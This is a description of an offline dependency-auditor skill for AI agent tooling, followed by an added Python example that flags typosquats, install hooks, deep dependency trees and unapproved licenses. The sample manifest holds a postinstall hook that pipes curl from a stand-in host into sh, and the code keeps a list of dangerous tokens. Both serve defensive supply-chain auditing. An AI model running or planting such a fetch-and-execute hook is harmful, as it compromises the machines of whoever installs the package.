Before you let a skill run npm install or pip install, this auditor steps in to check for typosquatting, known CVEs, sketchy install hooks, and other supply-chain red flags. It walks through a five-point checklist covering package legitimacy (does the name sit a keystroke or two away from a popular package?), vulnerability severity, suspicious lifecycle scripts such as preinstall and postinstall hooks, dependency depth, and license compatibility. The skill stays offline by design (network: false), so it leans on local audit commands and manual checks rather than live API calls; the practical caveat is that its CVE coverage is only as current as whatever advisory data is already on the machine. It's most useful when a skill you don't fully trust wants to pull in dependencies, or when you're doing periodic security sweeps. The output is a pass/warn/reject verdict with concrete next steps, not just a risk score.
npx skills add https://github.com/useai-pro/openclaw-skills-security --skill dependency-auditor
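The offline checks the checklist describes can be sketched in plain Python. The block below is an added example, not code from the dependency-auditor skill or the openclaw-skills-security repository: it runs a typosquat edit-distance check against a constructed list of well-known names, scans package.json lifecycle hooks for commands that fetch or eval code, measures nesting depth in a dependency tree shaped like the nested dependencies map that npm ls --json prints (an assumed shape), applies a license allowlist, and folds the findings into a pass/warn/reject verdict. The thresholds (edit distance 2, depth limit 4) and the sample manifest are assumptions made for illustration; the CVE step is omitted because it needs advisory data that is not on this page.

```python
"""Offline pre-install checks: typosquat distance, install hooks, dependency
depth and license allowlist, reduced to a pass/warn/reject verdict.
Added example; assumptions are marked in comments."""
import json

# Constructed for this example: a short list of well-known names that a
# typosquat would imitate. A real allowlist would be far larger.
KNOWN_GOOD = {"lodash", "express", "axios", "react", "chalk", "minimist"}
ALLOWED_LICENSES = {"MIT", "ISC", "BSD-2-Clause", "BSD-3-Clause", "Apache-2.0"}
# npm runs these scripts automatically during install.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Tokens that turn an install hook from a warning into a hard reject (assumed list).
DANGEROUS_TOKENS = ("curl ", "wget ", "| sh", "| bash", "base64", "eval(")
MAX_DEPTH = 4  # assumed limit for the dependency-depth check


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to spot names a keystroke or two from a popular package."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_matches(name: str, known=KNOWN_GOOD) -> list[str]:
    """Known names within edit distance 2 of `name`; an exact match is legitimate."""
    if name in known or len(name) < 4:
        return []
    return sorted(k for k in known if levenshtein(name, k) <= 2)


def install_hooks(manifest: dict) -> dict[str, str]:
    """Lifecycle scripts in a package.json dict that run without the user asking."""
    scripts = manifest.get("scripts", {})
    return {h: scripts[h] for h in LIFECYCLE_HOOKS if h in scripts}


def dependency_depth(tree: dict) -> int:
    """Deepest nesting in a {"dependencies": {name: {...}}} tree (assumed npm ls --json shape)."""
    deps = tree.get("dependencies", {})
    if not deps:
        return 0
    return 1 + max(dependency_depth(d) for d in deps.values())


def audit(manifest: dict, tree: dict) -> dict:
    """Run the checks and reduce them to a verdict plus human-readable findings."""
    findings, level = [], 0  # 0 = pass, 1 = warn, 2 = reject

    def note(severity: int, text: str) -> None:
        nonlocal level
        level = max(level, severity)
        findings.append(text)

    for dep in [manifest.get("name", "")] + list(manifest.get("dependencies", {})):
        for hit in typosquat_matches(dep):
            note(1, f"{dep!r} is within 2 edits of well-known {hit!r}: possible typosquat")

    for hook, cmd in install_hooks(manifest).items():
        if any(tok in cmd for tok in DANGEROUS_TOKENS):
            note(2, f"{hook} hook fetches or evals code: {cmd!r}")
        else:
            note(1, f"{hook} hook present, review it by hand: {cmd!r}")

    depth = dependency_depth(tree)
    if depth > MAX_DEPTH:
        note(1, f"dependency tree is {depth} levels deep (limit {MAX_DEPTH})")

    lic = manifest.get("license")
    if lic not in ALLOWED_LICENSES:
        note(1, f"license {lic!r} is not on the allowlist")

    return {"verdict": ("pass", "warn", "reject")[level], "findings": findings}


# Constructed sample input, not a real package: a typosquat-like name, a
# postinstall hook that pipes curl into sh, a misspelled dependency and an
# unapproved license string.
SAMPLE_MANIFEST = json.loads("""{
  "name": "lodahs", "version": "1.0.0", "license": "SEE LICENSE IN LICENSE",
  "scripts": {"postinstall": "curl -s http://example.invalid/i.sh | sh"},
  "dependencies": {"express": "^4.0.0", "minimsit": "^1.2.0"}
}""")
SAMPLE_TREE = {"dependencies": {"express": {"dependencies": {
    "debug": {"dependencies": {"ms": {}}}}}}}

if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE_MANIFEST, SAMPLE_TREE), indent=2))
```

The verdict ladder is deliberately one-way: any single reject-grade finding (here, an install hook that pulls code off the network) outranks however many clean checks surround it, which is what makes the result actionable rather than a blended score. Running it on the sample prints a reject with four findings; swapping in a manifest with a benign postinstall such as node setup.js drops to warn, and a manifest with no hooks, a known name and an allowlisted license passes.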